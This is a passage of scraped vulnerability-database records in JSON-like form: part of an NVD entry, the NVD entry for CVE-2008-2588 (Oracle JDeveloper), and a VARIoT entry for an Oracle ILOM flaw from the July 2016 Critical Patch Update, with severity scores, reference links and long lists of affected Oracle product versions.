"af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r972f82d821b805d04602976a9736c01b6bf218cfe0c3f48b472db488%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rcc35ab6be300365de5ff9587e0479d10d7d7c79070921837e3693162%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rd3f99d732baed459b425fb0a9e9e14f7843c9459b12037e4a9d753b5%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdebc1830d6c09c11d5a4804ca26769dbd292d17d361c61dea50915f0%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/re13bd219dd4b651134f6357f12bd07a0344eea7518c577bbdd185265%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3Csolr-user.lucene.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QLJIK2AUOZOWXR3S5XXBUNMOF3RTHTI7/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZB3GB7YXIOUKIOQ27VTIP6KKGJJ3CKL/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.netapp.com/advisory/ntap-20230818-0001/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Not Applicable", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], sourceIdentifier: "security@apache.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-835", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2008-10-14 21:11
Modified
2025-04-09 00:30
Severity ?
Summary
Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| oracle | jdeveloper | 10.1.2.2 |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:jdeveloper:10.1.2.2:*:*:*:*:*:*:*", matchCriteriaId: "8EE422EB-0F67-48D1-AAB0-9C43D452F5B8", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "Unspecified vulnerability in the Oracle JDeveloper component in Oracle Application Server 10.1.2.2 allows local users to affect confidentiality via unknown vectors.", }, { lang: "es", value: "Vulnerabilidad no especificada en el componente Oracle JDeveloper en Oracle Application Server v10.1.2.2 permite a usuarios locales afectar a la confidencialidad a través de vectores desconocidos.", }, ], id: "CVE-2008-2588", lastModified: "2025-04-09T00:30:58.490", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "LOW", cvssData: { accessComplexity: "LOW", accessVector: "LOCAL", authentication: "NONE", availabilityImpact: "NONE", baseScore: 2.1, confidentialityImpact: "PARTIAL", integrityImpact: "NONE", vectorString: "AV:L/AC:L/Au:N/C:P/I:N/A:N", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2008-10-14T21:11:10.833", references: [ { source: "cve@mitre.org", tags: [ "Vendor Advisory", ], url: "http://secunia.com/advisories/32291", }, { source: "cve@mitre.org", url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { source: "cve@mitre.org", url: "http://www.securitytracker.com/id?1021054", }, { source: "cve@mitre.org", url: "http://www.vupen.com/english/advisories/2008/2825", }, { source: "cve@mitre.org", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Vendor Advisory", ], url: "http://secunia.com/advisories/32291", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.oracle.com/technetwork/topics/security/cpuoct2008-100299.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.securitytracker.com/id?1021054", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://www.vupen.com/english/advisories/2008/2825", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/45877", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-noinfo", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
var-201607-0587
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect integrity via vectors related to Web. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'HTTP' protocol. The 'Web' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. A remote attacker could exploit this vulnerability to update, insert, or delete data, affecting data integrity
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0587", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: 